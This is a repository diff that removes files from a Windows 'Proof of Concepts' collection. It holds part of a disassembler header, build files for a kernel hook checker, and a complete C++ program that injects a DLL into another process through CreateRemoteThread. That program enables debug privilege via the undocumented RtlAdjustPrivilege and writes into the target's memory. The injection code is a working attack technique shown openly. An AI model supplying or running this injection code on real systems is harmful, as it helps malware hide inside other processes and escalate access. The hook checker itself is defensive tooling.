#define REGISTER_TYPE_GEN 1
#define REGISTER_TYPE_SEGMENT 2
#define REGISTER_TYPE_DEBUG 3
#define REGISTER_TYPE_CONTROL 4
#define REGISTER_TYPE_TEST 5
#define REGISTER_TYPE_XMM 6
#define REGISTER_TYPE_MMX 7
#define REGISTER_TYPE_FPU 8
// Disassembling mode
enum Mode {
MODE_32, // 32-bit
MODE_16 // 16-bit
};
// Disassembling format
enum Format {
FORMAT_ATT,
FORMAT_INTEL,
};
// Instruction types (just the most common ones atm)
enum Instruction {
// Integer instructions
INSTRUCTION_TYPE_ASC, // aaa, aam, etc.
INSTRUCTION_TYPE_DCL, // daa, das
INSTRUCTION_TYPE_MOV,
INSTRUCTION_TYPE_MOVSR, // segment register
INSTRUCTION_TYPE_ADD,
INSTRUCTION_TYPE_XADD,
INSTRUCTION_TYPE_ADC,
INSTRUCTION_TYPE_SUB,
INSTRUCTION_TYPE_SBB,
INSTRUCTION_TYPE_INC,
INSTRUCTION_TYPE_DEC,
INSTRUCTION_TYPE_DIV,
INSTRUCTION_TYPE_IDIV,
INSTRUCTION_TYPE_NOT,
INSTRUCTION_TYPE_NEG,
INSTRUCTION_TYPE_STOS,
INSTRUCTION_TYPE_LODS,
INSTRUCTION_TYPE_SCAS,
INSTRUCTION_TYPE_MOVS,
INSTRUCTION_TYPE_MOVSX,
INSTRUCTION_TYPE_MOVZX,
INSTRUCTION_TYPE_CMPS,
INSTRUCTION_TYPE_SHX, // signed/unsigned shift left/right
INSTRUCTION_TYPE_ROX, // signed/unsigned rot left/right
INSTRUCTION_TYPE_MUL,
INSTRUCTION_TYPE_IMUL,
INSTRUCTION_TYPE_EIMUL, // "extended" imul with 2-3 operands
INSTRUCTION_TYPE_XOR,
INSTRUCTION_TYPE_LEA,
INSTRUCTION_TYPE_XCHG,
INSTRUCTION_TYPE_CMP,
INSTRUCTION_TYPE_TEST,
INSTRUCTION_TYPE_PUSH,
INSTRUCTION_TYPE_AND,
INSTRUCTION_TYPE_OR,
INSTRUCTION_TYPE_POP,
INSTRUCTION_TYPE_JMP,
INSTRUCTION_TYPE_JMPC, // conditional jump
INSTRUCTION_TYPE_SETC, // conditional byte set
INSTRUCTION_TYPE_MOVC, // conditional mov
INSTRUCTION_TYPE_LOOP,
INSTRUCTION_TYPE_CALL,
INSTRUCTION_TYPE_RET,
INSTRUCTION_TYPE_INT, // interrupt
INSTRUCTION_TYPE_BT, // bit tests
INSTRUCTION_TYPE_BTS,
INSTRUCTION_TYPE_BTR,
INSTRUCTION_TYPE_BTC,
INSTRUCTION_TYPE_BSF,
INSTRUCTION_TYPE_BSR,
INSTRUCTION_TYPE_BSWAP,
INSTRUCTION_TYPE_SGDT,
INSTRUCTION_TYPE_SIDT,
INSTRUCTION_TYPE_SLDT,
INSTRUCTION_TYPE_LFP,
// FPU instructions
INSTRUCTION_TYPE_FCMOVC, // float conditional mov
INSTRUCTION_TYPE_FADD,
INSTRUCTION_TYPE_FADDP,
INSTRUCTION_TYPE_FIADD,
INSTRUCTION_TYPE_FSUB,
INSTRUCTION_TYPE_FSUBP,
INSTRUCTION_TYPE_FISUB,
INSTRUCTION_TYPE_FSUBR,
INSTRUCTION_TYPE_FSUBRP,
INSTRUCTION_TYPE_FISUBR,
INSTRUCTION_TYPE_FMUL,
INSTRUCTION_TYPE_FMULP,
INSTRUCTION_TYPE_FIMUL,
INSTRUCTION_TYPE_FDIV,
INSTRUCTION_TYPE_FDIVP,
INSTRUCTION_TYPE_FDIVR,
INSTRUCTION_TYPE_FDIVRP,
INSTRUCTION_TYPE_FIDIV,
INSTRUCTION_TYPE_FIDIVR,
INSTRUCTION_TYPE_FCOM,
INSTRUCTION_TYPE_FCOMP,
INSTRUCTION_TYPE_FCOMPP,
INSTRUCTION_TYPE_FCOMI,
INSTRUCTION_TYPE_FCOMIP,
INSTRUCTION_TYPE_FUCOM,
INSTRUCTION_TYPE_FUCOMP,
INSTRUCTION_TYPE_FUCOMPP,
INSTRUCTION_TYPE_FUCOMI,
INSTRUCTION_TYPE_FUCOMIP,
INSTRUCTION_TYPE_FST,
INSTRUCTION_TYPE_FSTP,
INSTRUCTION_TYPE_FIST,
INSTRUCTION_TYPE_FISTP,
INSTRUCTION_TYPE_FISTTP,
INSTRUCTION_TYPE_FLD,
INSTRUCTION_TYPE_FILD,
INSTRUCTION_TYPE_FICOM,
INSTRUCTION_TYPE_FICOMP,
INSTRUCTION_TYPE_FFREE,
INSTRUCTION_TYPE_FFREEP,
INSTRUCTION_TYPE_FXCH,
INSTRUCTION_TYPE_FPU, // Other FPU instructions
INSTRUCTION_TYPE_MMX, // Other MMX instructions
INSTRUCTION_TYPE_SSE, // Other SSE instructions
INSTRUCTION_TYPE_OTHER, // Other instructions :-)
INSTRUCTION_TYPE_PRIV // Privileged instruction
};
// Operand types
enum Operand {
OPERAND_TYPE_NONE, // operand not present
OPERAND_TYPE_MEMORY, // memory operand ([eax], [0], etc.)
OPERAND_TYPE_REGISTER, // register operand (eax, mm0, etc.)
OPERAND_TYPE_IMMEDIATE, // immediate operand (0x1234)
};
// Structure definitions
// struct INST is used internally by the library
typedef struct _INST {
enum Instruction type; // Instruction type
const char *mnemonic; // Instruction mnemonic
int flags1; // First operand flags (if any)
int flags2; // Second operand flags (if any)
int flags3; // Additional operand flags (if any)
int modrm; // Is MODRM byte present?
} INST, *PINST;
// Operands for the instruction
typedef struct _OPERAND {
enum Operand type; // Operand type (register, memory, etc)
int reg; // Register (if any)
int basereg; // Base register (if any)
int indexreg; // Index register (if any)
int scale; // Scale (if any)
int dispbytes; // Displacement bytes (0 = no displacement)
int dispoffset; // Displacement value offset
int immbytes; // Immediate bytes (0 = no immediate)
int immoffset; // Immediate value offset
int sectionbytes; // Section prefix bytes (0 = no section prefix)
WORD section; // Section prefix value
DWORD displacement; // Displacement value
DWORD immediate; // Immediate value
int flags; // Operand flags
} OPERAND, *POPERAND;
// struct INSTRUCTION is used to interface the library
typedef struct _INSTRUCTION {
int length; // Instruction length
enum Instruction type; // Instruction type
enum Mode mode; // Addressing mode
BYTE opcode; // Actual opcode
BYTE modrm; // MODRM byte
BYTE sib; // SIB byte
int extindex; // Extension table index
int fpuindex; // FPU table index
int dispbytes; // Displacement bytes (0 = no displacement)
int immbytes; // Immediate bytes (0 = no immediate)
int sectionbytes; // Section prefix bytes (0 = no section prefix)
OPERAND op1; // First operand (if any)
OPERAND op2; // Second operand (if any)
OPERAND op3; // Additional operand (if any)
PINST ptr; // Pointer to instruction table
int flags; // Instruction flags
} INSTRUCTION, *PINSTRUCTION;
// Function definitions
int get_instruction(
INSTRUCTION *inst, // pointer to INSTRUCTION structure
BYTE *addr, // code buffer
enum Mode mode // mode: MODE_32 or MODE_16
);
// Get complete instruction string
int get_instruction_string(
INSTRUCTION *inst, // pointer to INSTRUCTION structure
enum Format format, // instruction format: FORMAT_ATT or FORMAT_INTEL
DWORD offset, // instruction absolute address
char *string, // string buffer
int length // string length
);
// Get mnemonic string
int get_mnemonic_string(
INSTRUCTION *inst, // pointer to INSTRUCTION structure
enum Format format, // instruction format: FORMAT_ATT or FORMAT_INTEL
char *string, // string buffer
int length // string length
);
// Get individual operand string
int get_operand_string(
INSTRUCTION *inst, // pointer to INSTRUCTION structure
POPERAND op, // pointer to OPERAND structure
enum Format format, // instruction format: FORMAT_ATT or FORMAT_INTEL
DWORD offset, // instruction absolute address
char *string, // string buffer
int length // string length
);
// Helper functions
int get_register_type(
POPERAND op
);
int get_operand_type(
POPERAND op
);
int get_operand_register(
POPERAND op
);
int get_operand_basereg(
POPERAND op
);
int get_operand_indexreg(
POPERAND op
);
int get_operand_scale(
POPERAND op
);
int get_operand_immediate(
POPERAND op,
DWORD *imm // returned immediate value
);
int get_operand_displacement(
POPERAND op,
DWORD *disp // returned displacement value
);
POPERAND get_source_operand(
PINSTRUCTION inst
);
POPERAND get_destination_operand(
PINSTRUCTION inst
);
// Instruction prefix groups
// Group 1
#define MASK_PREFIX_G1(x) ((x) & 0xFF000000) >> 24
#define PREFIX_LOCK 0x01000000 // 0xf0
#define PREFIX_REPNE 0x02000000 // 0xf2
#define PREFIX_REP 0x03000000 // 0xf3
#define PREFIX_REPE 0x03000000 // 0xf3
// Group 2
#define MASK_PREFIX_G2(x) ((x) & 0x00FF0000) >> 16
#define PREFIX_ES_OVERRIDE 0x00010000 // 0x26
#define PREFIX_CS_OVERRIDE 0x00020000 // 0x2e
#define PREFIX_SS_OVERRIDE 0x00030000 // 0x36
#define PREFIX_DS_OVERRIDE 0x00040000 // 0x3e
#define PREFIX_FS_OVERRIDE 0x00050000 // 0x64
#define PREFIX_GS_OVERRIDE 0x00060000 // 0x65
// Group 3 & 4
#define MASK_PREFIX_G3(x) ((x) & 0x0000FF00) >> 8
#define MASK_PREFIX_OPERAND(x) ((x) & 0x00000F00) >> 8
#define MASK_PREFIX_ADDR(x) ((x) & 0x0000F000) >> 12
#define PREFIX_OPERAND_SIZE_OVERRIDE 0x00000100 // 0x66
#define PREFIX_ADDR_SIZE_OVERRIDE 0x00001000 // 0x67
// Extensions
#define MASK_EXT(x) ((x) & 0x000000FF)
#define EXT_G1 0x00000001
#define EXT_G2 0x00000002
#define EXT_G3 0x00000003
#define EXT_G4 0x00000004
#define EXT_G5 0x00000005
#define EXT_G6 0x00000006
#define EXT_G7 0x00000007
#define EXT_G8 0x00000008
#define EXT_G9 0x00000009
#define EXT_GA 0x0000000a
#define EXT_GB 0x0000000b
#define EXT_GC 0x0000000c
#define EXT_GD 0x0000000d
#define EXT_GE 0x0000000e
#define EXT_GF 0x0000000f
#define EXT_G0 0x00000010
// Extra groups for 2 and 3-byte opcodes, and FPU stuff
#define EXT_T2 0x00000020 // opcode table 2
#define EXT_CP 0x00000030 // co-processor
// Operand flags
#define FLAGS_NONE 0
// Operand Addressing Methods, from the Intel manual
#define MASK_AM(x) ((x) & 0x00FF0000)
#define AM_A 0x00010000 // Direct address with segment prefix
#define AM_C 0x00020000 // MODRM reg field defines control register
#define AM_D 0x00030000 // MODRM reg field defines debug register
#define AM_E 0x00040000 // MODRM byte defines reg/memory address
#define AM_G 0x00050000 // MODRM byte defines general-purpose reg
#define AM_I 0x00060000 // Immediate data follows
#define AM_J 0x00070000 // Immediate value is relative to EIP
#define AM_M 0x00080000 // MODRM mod field can refer only to memory
#define AM_O 0x00090000 // Displacement follows (without modrm/sib)
#define AM_P 0x000a0000 // MODRM reg field defines MMX register
#define AM_Q 0x000b0000 // MODRM defines MMX register or memory
#define AM_R 0x000c0000 // MODRM mod field can only refer to register
#define AM_S 0x000d0000 // MODRM reg field defines segment register
#define AM_T 0x000e0000 // MODRM reg field defines test register
#define AM_V 0x000f0000 // MODRM reg field defines XMM register
#define AM_W 0x00100000 // MODRM defines XMM register or memory
// Extra addressing modes used in this implementation
#define AM_I1 0x00200000 // Immediate byte 1 encoded in instruction
#define AM_REG 0x00210000 // Register encoded in instruction
// Operand Types, from the intel manual
#define MASK_OT(x) ((x) & 0xFF000000)
#define OT_a 0x01000000
#define OT_b 0x02000000 // always 1 byte
#define OT_c 0x03000000 // byte or word, depending on operand
#define OT_d 0x04000000 // double-word
#define OT_q 0x05000000 // quad-word
#define OT_dq 0x06000000 // double quad-word
#define OT_v 0x07000000 // word or double-word, depending on operand
#define OT_w 0x08000000 // always word
#define OT_p 0x09000000 // 32-bit or 48-bit pointer
#define OT_pi 0x0a000000 // quadword MMX register
#define OT_pd 0x0b000000 // 128-bit double-precision float
#define OT_ps 0x0c000000 // 128-bit single-precision float
#define OT_s 0x0d000000 // 6-byte pseudo descriptor
#define OT_sd 0x0e000000 // Scalar of 128-bit double-precision float
#define OT_ss 0x0f000000 // Scalar of 128-bit single-precision float
#define OT_si 0x10000000 // Doubleword integer register
#define OT_t 0x11000000 // 80-bit packed FP data
// Additional operand flags
#define MASK_FLAGS(x) ((x) & 0x0000FF00)
#define F_s 0x00000100 // sign-extend 1-byte immediate
#define F_r 0x00000200 // use segment register
#define F_f 0x00000300 // use FPU register
// MODRM byte
#define MASK_MODRM_MOD(x) (((x) & 0xc0) >> 6)
#define MASK_MODRM_REG(x) (((x) & 0x38) >> 3)
#define MASK_MODRM_RM(x) ((x) & 0x7)
// SIB byte
#define MASK_SIB_SCALE(x) MASK_MODRM_MOD(x)
#define MASK_SIB_INDEX(x) MASK_MODRM_REG(x)
#define MASK_SIB_BASE(x) MASK_MODRM_RM(x)
#ifdef __cplusplus
}
#endif
#endif

18
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHookDrv/CheckKernelHook/sources
View File

@ -1,18 +0,0 @@
TARGETNAME=CheckKernelHook
#TARGETPATH=$(BASEDIR)\lib
TARGETPATH=obj
TARGETTYPE=DRIVER
INCLUDES=.\
SOURCES= \
DriverEntry.c \
Common.c \
KernelHookCheck.c \
Reload.c \
FileSystem.c \
FixRelocation.c \
KernelReload.c \
libdasm.c

2142
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHookDrv/CheckKernelHook/tables.h
View File

File diff suppressed because it is too large Load Diff

3
Win32/Proof of Concepts/CheckKernelEATHook/ReadMe.txt
View File

@ -1,3 +0,0 @@
1.Reload the first kernel module
2.check EAT function (Zwxx)
3.check InlineHook (not Zwxx)

26
Win32/Proof of Concepts/CreateRemoteThreadInjection/CreateRemoteThread.sln
View File

@ -1,26 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 11.00
# Visual Studio 2010
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CreateRemoteThread", "CreateRemoteThread\CreateRemoteThread.vcxproj", "{62BBF757-A1B4-4FF4-89C0-2890DEF4983F}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Debug|x64 = Debug|x64
Release|Win32 = Release|Win32
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{62BBF757-A1B4-4FF4-89C0-2890DEF4983F}.Debug|Win32.ActiveCfg = Debug|Win32
{62BBF757-A1B4-4FF4-89C0-2890DEF4983F}.Debug|Win32.Build.0 = Debug|Win32
{62BBF757-A1B4-4FF4-89C0-2890DEF4983F}.Debug|x64.ActiveCfg = Debug|x64
{62BBF757-A1B4-4FF4-89C0-2890DEF4983F}.Debug|x64.Build.0 = Debug|x64
{62BBF757-A1B4-4FF4-89C0-2890DEF4983F}.Release|Win32.ActiveCfg = Release|Win32
{62BBF757-A1B4-4FF4-89C0-2890DEF4983F}.Release|Win32.Build.0 = Release|Win32
{62BBF757-A1B4-4FF4-89C0-2890DEF4983F}.Release|x64.ActiveCfg = Release|x64
{62BBF757-A1B4-4FF4-89C0-2890DEF4983F}.Release|x64.Build.0 = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

337
Win32/Proof of Concepts/CreateRemoteThreadInjection/CreateRemoteThread/CreateRemoteThread.cpp
View File

@ -1,337 +0,0 @@
/*
x86和x64的注入因为x64的系统增加了较多的权限的校验
x64提权主要就是用到了ntdll.dll中的未导出函数RtlAdjustPrivilege().
*/
#include "stdafx.h"
#include "CreateRemoteThread.h"
#include <strsafe.h>
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
// 唯一的应用程序对象
CWinApp theApp;
using namespace std;
typedef enum _WIN_VERSION
{
WindowsNT,
Windows2000,
WindowsXP,
Windows2003,
WindowsVista,
Windows7,
Windows8,
Windows10,
WinUnknown
}WIN_VERSION;
typedef NTSTATUS( NTAPI* fnRtlGetVersion )(PRTL_OSVERSIONINFOW lpVersionInformation);
VOID InjectDll(ULONG_PTR ProcessID, WCHAR* strPath);
WIN_VERSION GetWindowsVersion();
BOOL EnableDebugPrivilege();
BOOL InjectDllByRemoteThreadXP(const TCHAR* wzDllFile, ULONG_PTR ProcessId);
BOOL InjectDllByRemoteThreadWin7(const TCHAR* wzDllFile, ULONG_PTR ProcessId);
typedef long (__fastcall *pfnRtlAdjustPrivilege64)(ULONG,ULONG,ULONG,PVOID);
typedef long (__stdcall *pfnRtlAdjustPrivilege32)(ULONG,ULONG,ULONG,PVOID);
WIN_VERSION WinVersion = WinUnknown;
int _tmain(int argc, TCHAR* argv[], TCHAR* envp[])
{
WinVersion = GetWindowsVersion();
if(argc == 3)
{
ULONG ProcessId = 0;
swscanf_s(argv[1], L"%d", &ProcessId);
InjectDll(ProcessId, argv[2]);
}
return 0;
}
VOID InjectDll(ULONG_PTR ProcessID, WCHAR* strPath)
{
WCHAR wzPath[MAX_PATH] = {0};
if (ProcessID == 0 || strPath == NULL)
{
printf("Inject Fail ProcessId or strPath is not exists \r\n");
return;
}
GetCurrentDirectory(260,wzPath);
wcsncat_s(wzPath, L"\\", 2);
wcsncat_s(wzPath, strPath, wcslen(strPath));//dll完整路径
if (!PathFileExists(wzPath))
{
printf("Inject Fail strPath is not exists LastError [%d]\r\n", GetLastError());
return;
}
printf("Inject Target [%d], strPath [%S]\n", ProcessID, wzPath);
if(WinVersion >= Windows7)
{
if (!InjectDllByRemoteThreadWin7(wzPath,ProcessID))
printf("Inject Fail\r\n");
else
printf ("Inject Success\r\n");
}
else
{
if (!InjectDllByRemoteThreadXP(wzPath,ProcessID))
printf("Inject Fail\r\n");
else
printf("Inject Success\r\n");
}
}
BOOL InjectDllByRemoteThreadWin7(const TCHAR* wzDllFile, ULONG_PTR ProcessId)
{
if (NULL == wzDllFile || 0 == ::_tcslen(wzDllFile) || ProcessId == 0 || -1 == _taccess(wzDllFile, 0))
{
return FALSE;
}
HANDLE hProcess = NULL;
HANDLE hThread = NULL;
DWORD dwRetVal = 0;
LPTHREAD_START_ROUTINE FuncAddress = NULL;
DWORD dwSize = 0;
TCHAR* VirtualAddress = NULL;
//预编译支持Unicode
#ifdef _UNICODE
FuncAddress = (PTHREAD_START_ROUTINE)::GetProcAddress(::GetModuleHandle(_T("Kernel32")), "LoadLibraryW");
#else
FuncAddress = (PTHREAD_START_ROUTINE)::GetProcAddress(::GetModuleHandle(_T("Kernel32")), "LoadLibraryA");
#endif
if (FuncAddress==NULL)
{
return FALSE;
}
#ifdef _WIN64
pfnRtlAdjustPrivilege64 RtlAdjustPrivilege = NULL;
RtlAdjustPrivilege=(pfnRtlAdjustPrivilege64)GetProcAddress((HMODULE)(FuncAddress(L"ntdll.dll")),"RtlAdjustPrivilege");
#else
pfnRtlAdjustPrivilege32 RtlAdjustPrivilege = NULL;
RtlAdjustPrivilege=(pfnRtlAdjustPrivilege32)GetProcAddress((HMODULE)(FuncAddress(L"ntdll.dll")),"RtlAdjustPrivilege");
#endif
if (RtlAdjustPrivilege==NULL)
{
return FALSE;
}
/*
. SE_BACKUP_PRIVILEGE, "17",
. SE_RESTORE_PRIVILEGE, "18",
. SE_SHUTDOWN_PRIVILEGE, "19",
. SE_DEBUG_PRIVILEGE, "20",
*/
RtlAdjustPrivilege(20,1,0,&dwRetVal); //19
hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE, ProcessId);
if (NULL == hProcess)
{
printf("Open Process Fail lastError [%d]\r\n", GetLastError());
return FALSE;
}
// 在目标进程中分配内存空间
dwSize = (DWORD)::_tcslen(wzDllFile) + 1;
VirtualAddress = (TCHAR*)::VirtualAllocEx(hProcess, NULL, dwSize * sizeof(TCHAR), MEM_COMMIT, PAGE_READWRITE);
if (NULL == VirtualAddress)
{
printf("Virtual Process Memory Fail lastError [%d]\r\n", GetLastError());
CloseHandle(hProcess);
return FALSE;
}
// 在目标进程的内存空间中写入所需参数(模块名)
if (FALSE == ::WriteProcessMemory(hProcess, VirtualAddress, (LPVOID)wzDllFile, dwSize * sizeof(TCHAR), NULL))
{
printf("Write Data Fail LastError [%d]\r\n", GetLastError());
VirtualFreeEx(hProcess, VirtualAddress, dwSize, MEM_DECOMMIT);
CloseHandle(hProcess);
return FALSE;
}
hThread = ::CreateRemoteThread(hProcess, NULL, 0, FuncAddress, VirtualAddress, 0, NULL);
if (NULL == hThread)
{
printf("CreateRemoteThread Fail lastError [%d]\r\n", GetLastError());
VirtualFreeEx(hProcess, VirtualAddress, dwSize, MEM_DECOMMIT);
CloseHandle(hProcess);
return FALSE;
}
// 等待远程线程结束
WaitForSingleObject(hThread, INFINITE);
// 清理资源
VirtualFreeEx(hProcess, VirtualAddress, dwSize, MEM_DECOMMIT);
CloseHandle(hThread);
CloseHandle(hProcess);
return TRUE;
}
BOOL InjectDllByRemoteThreadXP(const TCHAR* wzDllFile, ULONG_PTR ProcessId)
{
// 参数无效
if (NULL == wzDllFile || 0 == ::_tcslen(wzDllFile) || ProcessId == 0 || -1 == _taccess(wzDllFile, 0))
{
return FALSE;
}
HANDLE hProcess = NULL;
HANDLE hThread = NULL;
DWORD dwSize = 0;
TCHAR* VirtualAddress = NULL;
LPTHREAD_START_ROUTINE FuncAddress = NULL;
if(!EnableDebugPrivilege())
{
printf("EnableDebugPrivilege fail lasterror is [%d]\n", GetLastError());
return FALSE;
}
// 获取目标进程句柄
hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, ProcessId);
if (NULL == hProcess)
{
printf("Open Process Fail LastError [%d]\r\n", GetLastError());
return FALSE;
}
// 在目标进程中分配内存空间
dwSize = (DWORD)::_tcslen(wzDllFile) + 1;
VirtualAddress = (TCHAR*)::VirtualAllocEx(hProcess, NULL, dwSize * sizeof(TCHAR), MEM_COMMIT, PAGE_READWRITE);
if (NULL == VirtualAddress)
{
printf("Virtual Process Memory Fail LastError [%d]\r\n", GetLastError());
CloseHandle(hProcess);
return FALSE;
}
// 在目标进程的内存空间中写入所需参数(模块名)
if (FALSE == ::WriteProcessMemory(hProcess, VirtualAddress, (LPVOID)wzDllFile, dwSize * sizeof(TCHAR), NULL))
{
printf("Write Data Fail LastError [%d]\r\n", GetLastError());
VirtualFreeEx(hProcess, VirtualAddress, dwSize, MEM_DECOMMIT);
CloseHandle(hProcess);
return FALSE;
}
// 从 Kernel32.dll 中获取 LoadLibrary 函数地址
#ifdef _UNICODE
FuncAddress = (PTHREAD_START_ROUTINE)::GetProcAddress(::GetModuleHandle(_T("Kernel32")), "LoadLibraryW");
#else
FuncAddress = (PTHREAD_START_ROUTINE)::GetProcAddress(::GetModuleHandle(_T("Kernel32")), "LoadLibraryA");
#endif
if (NULL == FuncAddress)
{
printf("Get LoadLibrary Fail LastError [%d]\r\n", GetLastError());
VirtualFreeEx(hProcess, VirtualAddress, dwSize, MEM_DECOMMIT);
CloseHandle(hProcess);
return false;
}
// 创建远程线程调用 LoadLibrary
hThread = ::CreateRemoteThread(hProcess, NULL, 0, FuncAddress, VirtualAddress, 0, NULL);
if (NULL == hThread)
{
printf("CreateRemoteThread Fail LastError [%d]\r\n", GetLastError());
VirtualFreeEx(hProcess, VirtualAddress, dwSize, MEM_DECOMMIT);
CloseHandle(hProcess);
return FALSE;
}
// 等待远程线程结束
WaitForSingleObject(hThread, INFINITE);
// 清理
VirtualFreeEx(hProcess, VirtualAddress, dwSize, MEM_DECOMMIT);
CloseHandle(hThread);
CloseHandle(hProcess);
return TRUE;
}
WIN_VERSION GetWindowsVersion()
{
RTL_OSVERSIONINFOEXW verInfo = { 0 };
verInfo.dwOSVersionInfoSize = sizeof( verInfo );
fnRtlGetVersion RtlGetVersion = (fnRtlGetVersion)GetProcAddress( GetModuleHandleW( L"ntdll.dll" ), "RtlGetVersion" );
if(RtlGetVersion != NULL && RtlGetVersion((PRTL_OSVERSIONINFOW)&verInfo) == 0)
{
if (verInfo.dwMajorVersion <= 4 )
{
return WindowsNT;
}
if (verInfo.dwMajorVersion == 5 && verInfo.dwMinorVersion == 0)
{
return Windows2000;
}
if (verInfo.dwMajorVersion == 5 && verInfo.dwMinorVersion == 1)
{
return WindowsXP;
}
if (verInfo.dwMajorVersion == 5 && verInfo.dwMinorVersion == 2)
{
return Windows2003;
}
if (verInfo.dwMajorVersion == 6 && verInfo.dwMinorVersion == 0)
{
return WindowsVista;
}
if (verInfo.dwMajorVersion == 6 && verInfo.dwMinorVersion == 1)
{
return Windows7;
}
if (verInfo.dwMajorVersion == 6 && verInfo.dwMinorVersion == 2 )
{
return Windows8;
}
if (verInfo.dwMajorVersion == 10 && verInfo.dwMinorVersion == 0 && verInfo.dwBuildNumber >= 10240)
{
return Windows10;
}
}
return WinUnknown;
}
BOOL EnableDebugPrivilege()
{
HANDLE hToken;
TOKEN_PRIVILEGES TokenPrivilege;
LUID uID;
if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken))
{
printf("OpenProcessToken is Error\n");
return FALSE;
}
if (!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&uID))
{
printf("LookupPrivilegeValue is Error\n");
return FALSE;
}
TokenPrivilege.PrivilegeCount = 1;
TokenPrivilege.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
TokenPrivilege.Privileges[0].Luid = uID;
//在这里我们进行调整权限
if (!AdjustTokenPrivileges(hToken,false,&TokenPrivilege,sizeof(TOKEN_PRIVILEGES),NULL,NULL))
{
printf("AdjuestTokenPrivileges is Error\n");
return FALSE;
}
return TRUE;
}

3
Win32/Proof of Concepts/CreateRemoteThreadInjection/CreateRemoteThread/CreateRemoteThread.h
View File

@ -1,3 +0,0 @@
#pragma once
#include "resource.h"

BIN
Win32/Proof of Concepts/CreateRemoteThreadInjection/CreateRemoteThread/CreateRemoteThread.rc
View File

Binary file not shown.

161
Win32/Proof of Concepts/CreateRemoteThreadInjection/CreateRemoteThread/CreateRemoteThread.vcxproj
View File

@ -1,161 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{62BBF757-A1B4-4FF4-89C0-2890DEF4983F}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>CreateRemoteThread</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<UseOfMfc>Dynamic</UseOfMfc>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<UseOfMfc>Dynamic</UseOfMfc>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<UseOfMfc>Dynamic</UseOfMfc>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<UseOfMfc>Dynamic</UseOfMfc>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
